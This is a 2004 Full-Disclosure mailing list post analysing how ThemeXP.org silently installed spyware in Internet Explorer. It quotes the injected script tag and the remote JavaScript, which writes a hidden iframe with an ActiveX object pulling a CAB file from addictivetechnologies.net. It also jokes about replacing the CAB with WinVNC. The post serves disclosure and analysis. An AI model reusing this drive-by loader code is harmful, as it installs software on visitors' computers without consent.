Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

RE: Spyware installs with no interaction in IE on fully patched XP SP2 box

From: Gossi The Dog <gossi () abate veritynet net>
Date: Mon, 4 Oct 2004 10:15:46 -0500 (CDT)
Yes...  ThemeXP.org has this in the HTML..
<!-- AUTO_PROMPT AD START --><script language="JavaScript" type="text/JavaScript " src="http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js";></script> 
<!-- AUTO_PROMPT AD END -->

Which calls...

http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js

Which contains...
document.write('<iframe id="downloads_manager" style="position:a 
bsolute;visibility:hidden;"></iframe>');

              document_code = '<html><head>\n';
              document_code += '<\/head><body>\n';
document_code += '<object onerror="window.parent.retry();" id="DDo wnload_UL1" classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA" codebase="http: //www.addictivetechnologies.net/DM0/cab/ATPartners.cab" HEIGHT=0 WIDTH=0><PARAM NAME="AffiliateID" VALUE="%2BA0%2CJ%7Dh%3AB6%5E%3B9gy%3E7ue%2D%7Dhx"></object>\n 
';
              document_code += '<\/body><\/html>';
              downloads_manager.document.write(document_code);
              downloads_manager.document.close();

                setCookie('minpopup80wu03rd','test',1);

...which downloads http:
//www.addictivetechnologies.net/DM0/cab/ATPartners.cab

...which means those using shitty MS browsers get owned, again.

If you want a laugh, replace the CAB files which WinVNC or somesuch.

--g

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: